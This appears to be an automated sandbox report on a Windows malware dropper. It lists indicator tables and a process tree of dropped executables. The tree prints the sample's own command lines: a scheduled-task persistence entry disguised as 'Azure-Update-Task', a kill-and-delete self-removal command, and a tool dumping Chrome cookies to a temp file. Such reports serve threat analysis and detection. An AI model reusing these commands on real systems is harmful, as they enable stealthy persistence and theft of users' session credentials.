1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	6ADB8AA23FE92E5441F1156CC3FB949E.exe

Script User-Agent 2 IoCs

Uses user-agent string associated with script host/environment.

Processes:

description	flow	ioc
HTTP User-Agent header	170	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	173	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

6ADB8AA23FE92E5441F1156CC3FB949E.exe_fq6YP3D659a_PgfU09uTrV2.exe1SnDYW6Whsv1Izd3oaZ9zcUM.exeWerFault.exeWerFault.exeWerFault.exe

pid	process
3904	6ADB8AA23FE92E5441F1156CC3FB949E.exe
3904	6ADB8AA23FE92E5441F1156CC3FB949E.exe
4188	_fq6YP3D659a_PgfU09uTrV2.exe
4188	_fq6YP3D659a_PgfU09uTrV2.exe
4188	_fq6YP3D659a_PgfU09uTrV2.exe
4188	_fq6YP3D659a_PgfU09uTrV2.exe
4908	1SnDYW6Whsv1Izd3oaZ9zcUM.exe
4908	1SnDYW6Whsv1Izd3oaZ9zcUM.exe
2116
2116
2116
2116
2116
2116
2116
2116
2116
2116
2116
2116
4204	WerFault.exe
4204	WerFault.exe
4204	WerFault.exe
4204	WerFault.exe
4204	WerFault.exe
4204	WerFault.exe
4204	WerFault.exe
4204	WerFault.exe
4204	WerFault.exe
4204	WerFault.exe
4204	WerFault.exe
4204	WerFault.exe
4204	WerFault.exe
4204	WerFault.exe
4876	WerFault.exe
4876	WerFault.exe
4204	WerFault.exe
4876	WerFault.exe
4876	WerFault.exe
4204	WerFault.exe
4876	WerFault.exe
4204	WerFault.exe
4876	WerFault.exe
4876	WerFault.exe
4204	WerFault.exe
4876	WerFault.exe
4876	WerFault.exe
4204	WerFault.exe
4876	WerFault.exe
4204	WerFault.exe
4876	WerFault.exe
4876	WerFault.exe
4876	WerFault.exe
4876	WerFault.exe
4876	WerFault.exe
4876	WerFault.exe
4876	WerFault.exe
4876	WerFault.exe
4876	WerFault.exe
4876	WerFault.exe
4280	WerFault.exe
4280	WerFault.exe
4280	WerFault.exe
4280	WerFault.exe

Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

1SnDYW6Whsv1Izd3oaZ9zcUM.exe

pid process

4908 1SnDYW6Whsv1Izd3oaZ9zcUM.exe

pid	process
4908	1SnDYW6Whsv1Izd3oaZ9zcUM.exe

Suspicious use of AdjustPrivilegeToken 17 IoCs

Processes:

ppxDDFjTf3nUIwbiUiAklr8a.exeZjXPy03ZyMBg4NaWiP53nV9i.exewoJpAwNuhUDLoUM_zWsw5B7h.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe7864334.exegxAhyHm5e53G3khUNI2WHNvw.exeVlUK18HKZY2z7RGvi4jt9Btg.exe

description	pid	process
Token: SeDebugPrivilege	2488	ppxDDFjTf3nUIwbiUiAklr8a.exe
Token: SeDebugPrivilege	2632	ZjXPy03ZyMBg4NaWiP53nV9i.exe
Token: SeDebugPrivilege	1588	woJpAwNuhUDLoUM_zWsw5B7h.exe
Token: SeDebugPrivilege	3860	WerFault.exe
Token: SeRestorePrivilege	4320	WerFault.exe
Token: SeBackupPrivilege	4320	WerFault.exe
Token: SeDebugPrivilege	4204	WerFault.exe
Token: SeDebugPrivilege	4876	WerFault.exe
Token: SeDebugPrivilege	4280	WerFault.exe
Token: SeDebugPrivilege	4320	WerFault.exe
Token: SeDebugPrivilege	4416	WerFault.exe
Token: SeShutdownPrivilege	2116
Token: SeCreatePagefilePrivilege	2116
Token: SeDebugPrivilege	5040	WerFault.exe
Token: SeDebugPrivilege	4348	7864334.exe
Token: SeDebugPrivilege	4100	gxAhyHm5e53G3khUNI2WHNvw.exe
Token: SeDebugPrivilege	4108	VlUK18HKZY2z7RGvi4jt9Btg.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

6ADB8AA23FE92E5441F1156CC3FB949E.exe

description	pid	process	target process
PID 3904 wrote to memory of 3980	3904	6ADB8AA23FE92E5441F1156CC3FB949E.exe	ZQWAaROBcV8sI9JaW4u63Lfm.exe
PID 3904 wrote to memory of 3980	3904	6ADB8AA23FE92E5441F1156CC3FB949E.exe	ZQWAaROBcV8sI9JaW4u63Lfm.exe
PID 3904 wrote to memory of 3980	3904	6ADB8AA23FE92E5441F1156CC3FB949E.exe	ZQWAaROBcV8sI9JaW4u63Lfm.exe
PID 3904 wrote to memory of 2644	3904	6ADB8AA23FE92E5441F1156CC3FB949E.exe	WerFault.exe
PID 3904 wrote to memory of 2644	3904	6ADB8AA23FE92E5441F1156CC3FB949E.exe	WerFault.exe
PID 3904 wrote to memory of 2644	3904	6ADB8AA23FE92E5441F1156CC3FB949E.exe	WerFault.exe
PID 3904 wrote to memory of 2372	3904	6ADB8AA23FE92E5441F1156CC3FB949E.exe	RpQewr0gAmgdT5I57ngeQ4vF.exe
PID 3904 wrote to memory of 2372	3904	6ADB8AA23FE92E5441F1156CC3FB949E.exe	RpQewr0gAmgdT5I57ngeQ4vF.exe
PID 3904 wrote to memory of 2372	3904	6ADB8AA23FE92E5441F1156CC3FB949E.exe	RpQewr0gAmgdT5I57ngeQ4vF.exe
PID 3904 wrote to memory of 1436	3904	6ADB8AA23FE92E5441F1156CC3FB949E.exe	Re5t94DsPfv_6HvIkcZAgFMJ.exe
PID 3904 wrote to memory of 1436	3904	6ADB8AA23FE92E5441F1156CC3FB949E.exe	Re5t94DsPfv_6HvIkcZAgFMJ.exe
PID 3904 wrote to memory of 1436	3904	6ADB8AA23FE92E5441F1156CC3FB949E.exe	Re5t94DsPfv_6HvIkcZAgFMJ.exe
PID 3904 wrote to memory of 2412	3904	6ADB8AA23FE92E5441F1156CC3FB949E.exe	k83wPQQogP6CmKwq6_GFcJGx.exe
PID 3904 wrote to memory of 2412	3904	6ADB8AA23FE92E5441F1156CC3FB949E.exe	k83wPQQogP6CmKwq6_GFcJGx.exe
PID 3904 wrote to memory of 1588	3904	6ADB8AA23FE92E5441F1156CC3FB949E.exe	woJpAwNuhUDLoUM_zWsw5B7h.exe
PID 3904 wrote to memory of 1588	3904	6ADB8AA23FE92E5441F1156CC3FB949E.exe	woJpAwNuhUDLoUM_zWsw5B7h.exe
PID 3904 wrote to memory of 3860	3904	6ADB8AA23FE92E5441F1156CC3FB949E.exe	WerFault.exe
PID 3904 wrote to memory of 3860	3904	6ADB8AA23FE92E5441F1156CC3FB949E.exe	WerFault.exe
PID 3904 wrote to memory of 2488	3904	6ADB8AA23FE92E5441F1156CC3FB949E.exe	ppxDDFjTf3nUIwbiUiAklr8a.exe
PID 3904 wrote to memory of 2488	3904	6ADB8AA23FE92E5441F1156CC3FB949E.exe	ppxDDFjTf3nUIwbiUiAklr8a.exe
PID 3904 wrote to memory of 3876	3904	6ADB8AA23FE92E5441F1156CC3FB949E.exe	5nk6Iter8p0beNiYXHTKvapq.exe
PID 3904 wrote to memory of 3876	3904	6ADB8AA23FE92E5441F1156CC3FB949E.exe	5nk6Iter8p0beNiYXHTKvapq.exe
PID 3904 wrote to memory of 3876	3904	6ADB8AA23FE92E5441F1156CC3FB949E.exe	5nk6Iter8p0beNiYXHTKvapq.exe
PID 3904 wrote to memory of 1728	3904	6ADB8AA23FE92E5441F1156CC3FB949E.exe	1SnDYW6Whsv1Izd3oaZ9zcUM.exe
PID 3904 wrote to memory of 1728	3904	6ADB8AA23FE92E5441F1156CC3FB949E.exe	1SnDYW6Whsv1Izd3oaZ9zcUM.exe
PID 3904 wrote to memory of 1728	3904	6ADB8AA23FE92E5441F1156CC3FB949E.exe	1SnDYW6Whsv1Izd3oaZ9zcUM.exe
PID 3904 wrote to memory of 1732	3904	6ADB8AA23FE92E5441F1156CC3FB949E.exe	EqngX1s6LSD5X9CDKyP2jznV.exe
PID 3904 wrote to memory of 1732	3904	6ADB8AA23FE92E5441F1156CC3FB949E.exe	EqngX1s6LSD5X9CDKyP2jznV.exe
PID 3904 wrote to memory of 1732	3904	6ADB8AA23FE92E5441F1156CC3FB949E.exe	EqngX1s6LSD5X9CDKyP2jznV.exe
PID 3904 wrote to memory of 3848	3904	6ADB8AA23FE92E5441F1156CC3FB949E.exe	3ADqDvEdKz6OdKmQLNPcMs9h.exe
PID 3904 wrote to memory of 3848	3904	6ADB8AA23FE92E5441F1156CC3FB949E.exe	3ADqDvEdKz6OdKmQLNPcMs9h.exe
PID 3904 wrote to memory of 3848	3904	6ADB8AA23FE92E5441F1156CC3FB949E.exe	3ADqDvEdKz6OdKmQLNPcMs9h.exe
PID 3904 wrote to memory of 4108	3904	6ADB8AA23FE92E5441F1156CC3FB949E.exe	VlUK18HKZY2z7RGvi4jt9Btg.exe
PID 3904 wrote to memory of 4108	3904	6ADB8AA23FE92E5441F1156CC3FB949E.exe	VlUK18HKZY2z7RGvi4jt9Btg.exe
PID 3904 wrote to memory of 4108	3904	6ADB8AA23FE92E5441F1156CC3FB949E.exe	VlUK18HKZY2z7RGvi4jt9Btg.exe
PID 3904 wrote to memory of 4100	3904	6ADB8AA23FE92E5441F1156CC3FB949E.exe	gxAhyHm5e53G3khUNI2WHNvw.exe
PID 3904 wrote to memory of 4100	3904	6ADB8AA23FE92E5441F1156CC3FB949E.exe	gxAhyHm5e53G3khUNI2WHNvw.exe
PID 3904 wrote to memory of 4100	3904	6ADB8AA23FE92E5441F1156CC3FB949E.exe	gxAhyHm5e53G3khUNI2WHNvw.exe
PID 3904 wrote to memory of 2608	3904	6ADB8AA23FE92E5441F1156CC3FB949E.exe	J8ItzY46z87Ncj8CgFwUAvPe.exe
PID 3904 wrote to memory of 2608	3904	6ADB8AA23FE92E5441F1156CC3FB949E.exe	J8ItzY46z87Ncj8CgFwUAvPe.exe
PID 3904 wrote to memory of 2608	3904	6ADB8AA23FE92E5441F1156CC3FB949E.exe	J8ItzY46z87Ncj8CgFwUAvPe.exe
PID 3904 wrote to memory of 2392	3904	6ADB8AA23FE92E5441F1156CC3FB949E.exe	UQ98lgbhxp4lsxi8ZL7_1kFc.exe
PID 3904 wrote to memory of 2392	3904	6ADB8AA23FE92E5441F1156CC3FB949E.exe	UQ98lgbhxp4lsxi8ZL7_1kFc.exe
PID 3904 wrote to memory of 2392	3904	6ADB8AA23FE92E5441F1156CC3FB949E.exe	UQ98lgbhxp4lsxi8ZL7_1kFc.exe
PID 3904 wrote to memory of 2052	3904	6ADB8AA23FE92E5441F1156CC3FB949E.exe	xp3mHcdLtImf6VJREk8CgMcU.exe
PID 3904 wrote to memory of 2052	3904	6ADB8AA23FE92E5441F1156CC3FB949E.exe	xp3mHcdLtImf6VJREk8CgMcU.exe
PID 3904 wrote to memory of 2052	3904	6ADB8AA23FE92E5441F1156CC3FB949E.exe	xp3mHcdLtImf6VJREk8CgMcU.exe
PID 3904 wrote to memory of 3964	3904	6ADB8AA23FE92E5441F1156CC3FB949E.exe	ra3wCNQNgLlVAScREtS1CvQU.exe
PID 3904 wrote to memory of 3964	3904	6ADB8AA23FE92E5441F1156CC3FB949E.exe	ra3wCNQNgLlVAScREtS1CvQU.exe
PID 3904 wrote to memory of 3964	3904	6ADB8AA23FE92E5441F1156CC3FB949E.exe	ra3wCNQNgLlVAScREtS1CvQU.exe
PID 3904 wrote to memory of 1408	3904	6ADB8AA23FE92E5441F1156CC3FB949E.exe	7knkrgEiWvE9h5CLtmtxkW1T.exe
PID 3904 wrote to memory of 1408	3904	6ADB8AA23FE92E5441F1156CC3FB949E.exe	7knkrgEiWvE9h5CLtmtxkW1T.exe
PID 3904 wrote to memory of 1408	3904	6ADB8AA23FE92E5441F1156CC3FB949E.exe	7knkrgEiWvE9h5CLtmtxkW1T.exe
PID 3904 wrote to memory of 2660	3904	6ADB8AA23FE92E5441F1156CC3FB949E.exe	NPZFrIefelB6sBQNQWP_LKBD.exe
PID 3904 wrote to memory of 2660	3904	6ADB8AA23FE92E5441F1156CC3FB949E.exe	NPZFrIefelB6sBQNQWP_LKBD.exe
PID 3904 wrote to memory of 2660	3904	6ADB8AA23FE92E5441F1156CC3FB949E.exe	NPZFrIefelB6sBQNQWP_LKBD.exe
PID 3904 wrote to memory of 3928	3904	6ADB8AA23FE92E5441F1156CC3FB949E.exe	bV51xpcQbneJHY7GGPOoCNMB.exe
PID 3904 wrote to memory of 3928	3904	6ADB8AA23FE92E5441F1156CC3FB949E.exe	bV51xpcQbneJHY7GGPOoCNMB.exe
PID 3904 wrote to memory of 3928	3904	6ADB8AA23FE92E5441F1156CC3FB949E.exe	bV51xpcQbneJHY7GGPOoCNMB.exe
PID 3904 wrote to memory of 2632	3904	6ADB8AA23FE92E5441F1156CC3FB949E.exe	ZjXPy03ZyMBg4NaWiP53nV9i.exe
PID 3904 wrote to memory of 2632	3904	6ADB8AA23FE92E5441F1156CC3FB949E.exe	ZjXPy03ZyMBg4NaWiP53nV9i.exe
PID 3904 wrote to memory of 4188	3904	6ADB8AA23FE92E5441F1156CC3FB949E.exe	_fq6YP3D659a_PgfU09uTrV2.exe
PID 3904 wrote to memory of 4188	3904	6ADB8AA23FE92E5441F1156CC3FB949E.exe	_fq6YP3D659a_PgfU09uTrV2.exe
PID 3904 wrote to memory of 4188	3904	6ADB8AA23FE92E5441F1156CC3FB949E.exe	_fq6YP3D659a_PgfU09uTrV2.exe

C:\Users\Admin\AppData\Local\Temp\6ADB8AA23FE92E5441F1156CC3FB949E.exe
"C:\Users\Admin\AppData\Local\Temp\6ADB8AA23FE92E5441F1156CC3FB949E.exe"
1⤵
- Checks computer location settings
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3904

C:\Users\Admin\Documents\ZQWAaROBcV8sI9JaW4u63Lfm.exe
"C:\Users\Admin\Documents\ZQWAaROBcV8sI9JaW4u63Lfm.exe"
2⤵
- Executes dropped EXE
PID:3980

C:\Users\Admin\Documents\ZQWAaROBcV8sI9JaW4u63Lfm.exe
"C:\Users\Admin\Documents\ZQWAaROBcV8sI9JaW4u63Lfm.exe"
3⤵
PID:6652

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
4⤵
PID:6992

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
5⤵
PID:7008

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
4⤵
PID:6128

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0x138,0x13c,0x140,0x114,0x144,0x7ffa48164f50,0x7ffa48164f60,0x7ffa48164f70
5⤵
PID:4756

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1620,557279382728420803,5924345654895919402,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1636 /prefetch:2
5⤵
PID:6456

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1620,557279382728420803,5924345654895919402,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1700 /prefetch:8
5⤵
PID:6872

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1620,557279382728420803,5924345654895919402,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2208 /prefetch:8
5⤵
PID:4136

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1620,557279382728420803,5924345654895919402,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2608 /prefetch:1
5⤵
PID:7064

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1620,557279382728420803,5924345654895919402,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2620 /prefetch:1
5⤵
PID:6724

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1620,557279382728420803,5924345654895919402,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3388 /prefetch:1
5⤵
PID:5296

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1620,557279382728420803,5924345654895919402,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3652 /prefetch:1
5⤵
PID:5424

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1620,557279382728420803,5924345654895919402,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3700 /prefetch:1
5⤵
PID:5464

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1620,557279382728420803,5924345654895919402,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3816 /prefetch:1
5⤵
PID:4856

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1620,557279382728420803,5924345654895919402,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4388 /prefetch:8
5⤵
- Executes dropped EXE
PID:5044

C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe
"C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --channel --force-configure-user-settings
5⤵
PID:4728

C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe
"C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0x240,0x244,0x248,0x21c,0x24c,0x7ff632d2a890,0x7ff632d2a8a0,0x7ff632d2a8b0
6⤵
PID:6936

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1620,557279382728420803,5924345654895919402,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5300 /prefetch:8
5⤵
PID:6884

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C taskkill /F /PID 6652 && choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Documents\ZQWAaROBcV8sI9JaW4u63Lfm.exe"
4⤵
PID:6444

C:\Windows\SysWOW64\taskkill.exe
taskkill /F /PID 6652
5⤵
- Kills process with taskkill
PID:656

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C taskkill /F /PID 6652 && choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Documents\ZQWAaROBcV8sI9JaW4u63Lfm.exe"
4⤵
PID:5520

C:\Windows\SysWOW64\taskkill.exe
taskkill /F /PID 6652
5⤵
- Kills process with taskkill
PID:6524

C:\Users\Admin\Documents\ihjhzBoqBdiSkO5s5Ezjc6W6.exe
"C:\Users\Admin\Documents\ihjhzBoqBdiSkO5s5Ezjc6W6.exe"
2⤵
PID:3860

C:\Users\Admin\AppData\Roaming\3965116.exe
"C:\Users\Admin\AppData\Roaming\3965116.exe"
3⤵
PID:5340

C:\Users\Admin\AppData\Roaming\2071875.exe
"C:\Users\Admin\AppData\Roaming\2071875.exe"
3⤵
PID:5496

C:\Users\Admin\Documents\5nk6Iter8p0beNiYXHTKvapq.exe
"C:\Users\Admin\Documents\5nk6Iter8p0beNiYXHTKvapq.exe"
2⤵
- Executes dropped EXE
PID:3876

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3876 -s 488
3⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4280

C:\Users\Admin\Documents\RpQewr0gAmgdT5I57ngeQ4vF.exe
"C:\Users\Admin\Documents\RpQewr0gAmgdT5I57ngeQ4vF.exe"
2⤵
- Executes dropped EXE
PID:2372

C:\Users\Admin\Documents\RpQewr0gAmgdT5I57ngeQ4vF.exe
C:\Users\Admin\Documents\RpQewr0gAmgdT5I57ngeQ4vF.exe
3⤵
- Executes dropped EXE
PID:2720

C:\Users\Admin\Documents\RpQewr0gAmgdT5I57ngeQ4vF.exe
C:\Users\Admin\Documents\RpQewr0gAmgdT5I57ngeQ4vF.exe
3⤵
PID:4080

C:\Users\Admin\Documents\woJpAwNuhUDLoUM_zWsw5B7h.exe
"C:\Users\Admin\Documents\woJpAwNuhUDLoUM_zWsw5B7h.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1588

C:\Users\Admin\AppData\Roaming\7864334.exe
"C:\Users\Admin\AppData\Roaming\7864334.exe"
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4348

C:\Users\Admin\AppData\Roaming\7864961.exe
"C:\Users\Admin\AppData\Roaming\7864961.exe"
3⤵
PID:5104

C:\Users\Admin\Documents\1SnDYW6Whsv1Izd3oaZ9zcUM.exe
"C:\Users\Admin\Documents\1SnDYW6Whsv1Izd3oaZ9zcUM.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1728

C:\Users\Admin\Documents\1SnDYW6Whsv1Izd3oaZ9zcUM.exe
"C:\Users\Admin\Documents\1SnDYW6Whsv1Izd3oaZ9zcUM.exe"
3⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:4908

C:\Users\Admin\Documents\EqngX1s6LSD5X9CDKyP2jznV.exe
"C:\Users\Admin\Documents\EqngX1s6LSD5X9CDKyP2jznV.exe"
2⤵
- Executes dropped EXE
PID:1732

C:\Users\Admin\Documents\EqngX1s6LSD5X9CDKyP2jznV.exe
"{path}"
3⤵
PID:752

C:\Windows\SysWOW64\schtasks.exe
/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
4⤵
- Creates scheduled task(s)
PID:2648

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
5⤵
PID:5044

C:\Users\Admin\Documents\Re5t94DsPfv_6HvIkcZAgFMJ.exe
"C:\Users\Admin\Documents\Re5t94DsPfv_6HvIkcZAgFMJ.exe"
2⤵
- Executes dropped EXE
PID:1436

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1436 -s 1052
3⤵
- Program crash
PID:4348

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1436 -s 1292
3⤵
- Program crash
PID:5448

C:\Users\Admin\Documents\k83wPQQogP6CmKwq6_GFcJGx.exe
"C:\Users\Admin\Documents\k83wPQQogP6CmKwq6_GFcJGx.exe"
2⤵
- Executes dropped EXE
PID:2412

C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
3⤵
PID:5780

C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
3⤵
PID:4720

C:\Users\Admin\Documents\3ADqDvEdKz6OdKmQLNPcMs9h.exe
"C:\Users\Admin\Documents\3ADqDvEdKz6OdKmQLNPcMs9h.exe"
2⤵
- Executes dropped EXE
PID:3848

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3848 -s 760
3⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4876

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3848 -s 816
3⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:5040

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3848 -s 840
3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Program crash
PID:2644

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3848 -s 956
3⤵
- Program crash
PID:5908

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3848 -s 984
3⤵
- Program crash
PID:5212

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3848 -s 1048
3⤵
- Program crash
PID:3860

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3848 -s 1344
3⤵
- Program crash
PID:6012

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3848 -s 1432
3⤵
- Program crash
PID:4980

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3848 -s 1460
3⤵
- Program crash
PID:4804

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3848 -s 1288
3⤵
- Program crash
PID:6136

C:\Users\Admin\Documents\bV51xpcQbneJHY7GGPOoCNMB.exe
"C:\Users\Admin\Documents\bV51xpcQbneJHY7GGPOoCNMB.exe"
2⤵
- Executes dropped EXE
PID:3928

C:\Users\Admin\Documents\bV51xpcQbneJHY7GGPOoCNMB.exe
C:\Users\Admin\Documents\bV51xpcQbneJHY7GGPOoCNMB.exe
3⤵
PID:6140

C:\Users\Admin\Documents\bV51xpcQbneJHY7GGPOoCNMB.exe
